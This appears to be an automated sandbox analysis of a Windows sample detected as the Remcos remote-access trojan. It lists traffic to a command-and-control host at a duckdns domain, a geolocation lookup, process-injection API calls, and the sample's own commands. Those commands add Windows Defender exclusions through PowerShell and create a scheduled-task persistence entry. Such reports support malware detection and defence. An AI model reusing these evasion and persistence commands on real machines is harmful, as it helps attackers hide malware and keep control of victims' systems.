                      Sep 25, 2024 19:49:38.402223110 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402251005 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402277946 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402326107 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402354002 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402381897 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402409077 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.402436018 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.403794050 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.403824091 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.403875113 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.403903008 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.403930902 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:38.841459990 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:38.846472979 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.186167002 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.238652945 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:39.240005016 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:39.244702101 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.244715929 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245832920 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245843887 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245853901 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245862961 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245872021 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245881081 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.245889902 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.246016026 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.246025085 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.246033907 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.246042013 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.246052027 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.247097969 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.247118950 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.247132063 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.247143984 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:39.700747967 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:39.706912041 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.024368048 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.073152065 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:40.074497938 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:40.078753948 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078767061 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078774929 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078845024 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078918934 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078927040 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.078994989 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079536915 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079545975 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079592943 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079602003 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079619884 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079627991 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.079638958 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.080143929 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.080152035 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.080440044 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.080816031 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.530148983 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:40.535119057 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.881659985 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.931618929 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:40.932898045 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:40.936850071 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936866999 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936887026 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936897039 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936907053 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936914921 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936925888 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936929941 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936948061 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936955929 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936964035 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936973095 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936990023 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.936997890 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.937746048 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.937755108 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.937855005 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:40.937916994 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.360384941 CEST4971952121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:41.365330935 CEST5212149719103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.694633961 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.727957010 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:41.729260921 CEST4972052121192.168.2.9103.186.116.145
                      Sep 25, 2024 19:49:41.732995987 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733026981 CEST5212149720103.186.116.145192.168.2.9
                      Sep 25, 2024 19:49:41.733057976 CEST5212149720103.186.116.145192.168.2.9
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Sep 25, 2024 19:45:40.651748896 CEST | 54098 | 53 | 192.168.2.9 | 1.1.1.1
                      Sep 25, 2024 19:45:41.321743011 CEST | 53 | 54098 | 1.1.1.1 | 192.168.2.9
                      Sep 25, 2024 19:45:45.817456961 CEST | 51712 | 53 | 192.168.2.9 | 1.1.1.1
                      Sep 25, 2024 19:45:45.825076103 CEST | 53 | 51712 | 1.1.1.1 | 192.168.2.9
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Sep 25, 2024 19:45:40.651748896 CEST | 192.168.2.9 | 1.1.1.1 | 0x3bca | Standard query (0) | officerem.duckdns.org | A (IP address) | IN (0x0001) | false
                      Sep 25, 2024 19:45:45.817456961 CEST | 192.168.2.9 | 1.1.1.1 | 0x2f1d | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Sep 25, 2024 19:45:41.321743011 CEST | 1.1.1.1 | 192.168.2.9 | 0x3bca | No error (0) | officerem.duckdns.org | (none) | 103.186.116.145 | A (IP address) | IN (0x0001) | false
                      Sep 25, 2024 19:45:45.825076103 CEST | 1.1.1.1 | 192.168.2.9 | 0x2f1d | No error (0) | geoplugin.net | (none) | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                      • geoplugin.net
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.9 | 49712 | 178.237.33.50 | 80 | 5292 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 25, 2024 19:45:45.837045908 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                      Host: geoplugin.net
                      Cache-Control: no-cache
                      Sep 25, 2024 19:45:46.455668926 CEST | 1170 | IN | HTTP/1.1 200 OK
                      date: Wed, 25 Sep 2024 17:45:46 GMT
                      server: Apache
                      content-length: 962
                      content-type: application/json; charset=utf-8
                      cache-control: public, max-age=300
                      access-control-allow-origin: *
                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                      Target ID:0
                      Start time:13:45:35
                      Start date:25/09/2024
                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
                      Imagebase:0xb70000
                      File size:918'016 bytes
                      MD5 hash:64219E1931808919FD05DCFB458DFC25
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      Target ID:3
                      Start time:13:45:36
                      Start date:25/09/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
                      Imagebase:0x4a0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:13:45:36
                      Start date:25/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff70f010000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:5
                      Start time:13:45:37
                      Start date:25/09/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
                      Imagebase:0x4a0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:6
                      Start time:13:45:37
                      Start date:25/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff70f010000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:7
                      Start time:13:45:37
                      Start date:25/09/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"
                      Imagebase:0xfe0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:8
                      Start time:13:45:37
                      Start date:25/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff70f010000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:13:45:37
                      Start date:25/09/2024
                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
                      Imagebase:0x800000
                      File size:918'016 bytes
                      MD5 hash:64219E1931808919FD05DCFB458DFC25
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Target ID:10
                      Start time:13:45:38
                      Start date:25/09/2024
                      Path:C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                      Imagebase:0x5a0000
                      File size:918'016 bytes
                      MD5 hash:64219E1931808919FD05DCFB458DFC25
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 21%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:11
                      Start time:13:45:39
                      Start date:25/09/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff72d8c0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:12
                      Start time:13:45:42
                      Start date:25/09/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp"
                      Imagebase:0xfe0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:13
                      Start time:13:45:42
                      Start date:25/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff70f010000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:15
                      Start time:13:45:43
                      Start date:25/09/2024
                      Path:C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
                      Imagebase:0xb0000
                      File size:918'016 bytes
                      MD5 hash:64219E1931808919FD05DCFB458DFC25
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:16
                      Start time:13:45:43
                      Start date:25/09/2024
                      Path:C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
                      Imagebase:0x6a0000
                      File size:918'016 bytes
                      MD5 hash:64219E1931808919FD05DCFB458DFC25
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:true


                        Execution Graph

                        Execution Coverage:12.2%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:153
                        Total number of Limit Nodes:6

                        Control-flow Graph

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071E78AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: a163494b2f74ee8cf93ac79df69fe2b22a71f24bd32c07124d7e50ca8c6c7017
                        • Instruction ID: 74f9670f1b18cfae12ddbfdb863ddd28ad9f86e2c3567b33085e0401edcde56a
                        • Opcode Fuzzy Hash: a163494b2f74ee8cf93ac79df69fe2b22a71f24bd32c07124d7e50ca8c6c7017
                        • Instruction Fuzzy Hash: 78B18EB1D00619CFEB21CF69C844BEEBBF6BF48314F148569D808A7280DB749985CF91

                        Control-flow Graph

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071E78AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 61f7b081f5cbd5444eeb9719d1e2e66532a985c96100688f0f70122dbacc3e0c
                        • Instruction ID: 59cc5fcaff01290fea0fa8f8019610f0f303540b6c0e04e7900be3561f62179f
                        • Opcode Fuzzy Hash: 61f7b081f5cbd5444eeb9719d1e2e66532a985c96100688f0f70122dbacc3e0c
                        • Instruction Fuzzy Hash: A3916DB1D00619CFEB25CF69C845BEEBBB6BF48310F1481A9D808A72C0DB749985CF91

                        Control-flow Graph
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0

                        Control-flow Graph
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02E159C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0

                        Control-flow Graph
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02E159C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0

                        Control-flow Graph
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 071EB9BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0

                        Control-flow Graph
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071E7480
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0

                        Control-flow Graph
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071E7480
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0

                        Control-flow Graph
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071E6E9E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0

                        Control-flow Graph
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071E7560
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0

                        Control-flow Graph
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E1D58E,?,?,?,?,?), ref: 02E1D64F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0

                        Control-flow Graph
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071E6E9E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0

                        Control-flow Graph
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071E7560
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0

                        Control-flow Graph
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E1D58E,?,?,?,?,?), ref: 02E1D64F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0

                        Control-flow Graph
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071E739E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071E739E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02E1B104), ref: 02E1B33E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1601365371.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2e10000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1610194449.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71e0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        APIs
